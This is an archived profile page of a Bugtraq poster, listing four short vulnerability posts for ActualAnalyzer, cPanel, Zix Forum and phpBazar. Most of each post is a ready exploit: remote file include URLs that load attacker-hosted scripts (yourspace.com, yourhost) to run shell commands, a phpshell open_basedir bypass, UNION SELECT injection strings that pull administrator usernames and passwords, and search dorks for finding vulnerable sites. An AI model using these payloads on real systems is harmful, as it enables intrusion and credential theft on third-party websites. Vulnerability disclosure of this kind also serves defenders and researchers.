i...@hotmail.com (i...@hotmail.com)

Profile | Posts (4)

User Information

Display Name:

i...@hotmail.com

Partial Email Address:

i...@hotmail.com

Posts:

4	total
4	in Bugtraq

4 Most Recent

1) i...@hotmail.com ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability

+1 vote

Vendor: ActualScripts URL: http://actualscripts.com Credits: Discovered by: 'Aesthetico'...

Bugtraq

[ Profile | Reply to group ]

[ Flat Thread Threaded ]

-----------------------------------------------------------------
Vendor: ActualScripts
URL: http://actualscripts.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "ActualScripts, Company. All rights reserved."
-----------------------------------------------------------------

Exploitation:

/direct.php?rf=http://www.yourspace.com/yourscript.php?
/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# PHP Emperor
# [email protected: i...@hotmail.com]
# Greets Dr.ExE , Pro Hackers

2) i...@hotmail.com cPanel OpenBaseDir Bypass

+1 vote

Hey when you try to run a phpshell and open BaseDir is on you will se that: Open base dir:...

Bugtraq

[ Profile | Reply to group ]

[ Flat Thread Threaded ]

Hey
when you try to run a phpshell and open BaseDir is on you will se that:
Open base dir: /home/***/:/usr/lib/php:/usr/local/lib/php:/tmp
Okey.. now run the phpshell with user
like that:
http://server.***.com/~***/phpshell.php
you will see that:
Open base dir: OFF (not secure)
---------------------------------
Found By: PHP Emperor
Greets: Dr.ExE , Pro Hacker's

3) i...@hotmail.com Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

+1 vote

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Vulnerability: SQL_Injection: Input passed to...

Bugtraq

[ Profile | Reply to group ]

[ Flat Thread Threaded ]

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .

Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com

4) i...@hotmail.com phpBazar <= 2.1.0 Multiple vulnerabilites

+1 vote

Title: phpBazar <= 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork:...

Bugtraq

[ Profile | Reply to group ]

[ Flat Thread Threaded ]

Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# Found By PHP Emperor

Highlight

Profile | Posts (4)

Home > People > i...@hotmail.com